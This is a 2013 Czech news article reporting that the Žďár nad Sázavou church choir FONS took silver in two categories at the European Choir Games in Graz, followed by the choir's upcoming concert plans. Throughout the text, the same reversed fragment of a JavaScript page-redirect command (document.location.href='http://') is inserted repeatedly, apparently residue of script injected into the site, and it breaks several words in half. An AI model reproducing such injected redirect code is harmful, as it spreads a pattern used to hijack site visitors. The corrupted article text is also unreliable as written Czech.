Žďár nad Sázavou, aktuality, Fons, sbor
Rainbow page separator

Žďárský sbor dovezl ze soutěže stříbro

Pondělí, 12. srpna 2013

fons-slavnostni-koncert-small (1)Žďár nad Sázavou / Stříbrnou příčku, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hned ve dvou kategoriích, obsadil žďárský chrámový sbor FONS pod vedením sbormistrů Miroslavy Smékalové a Leoše Drahotského v prestižní soutěži European Choir Games v rakouském Grazu. Soutěže se zúčastnilo celkem 72 pěveckých sborů z celého světa. FONS mezinárodní porota ocenila v kategoriích duchovní hudba a komorní pěvecké sbory.

Kromě žďárského sboru se pěveckého klání účastnily ještě další tři soubory z České republiky, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pražská pěvecká tělesa Abbelimen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, Zvonky a Spektrum.

V současné době chrámový sbor FONS chystá provedení Tomáškovy Korunovační mše při příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti svátku Nanebevzetí Panny Marie v zámecké bazilice ve Žďáře nad Sázavou. Dále pěvecký sbor připravuje také Sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továclavský festival duchovní hudby FONS, který se ve svátek svatého Václava uskuteční rovněž v bazilice.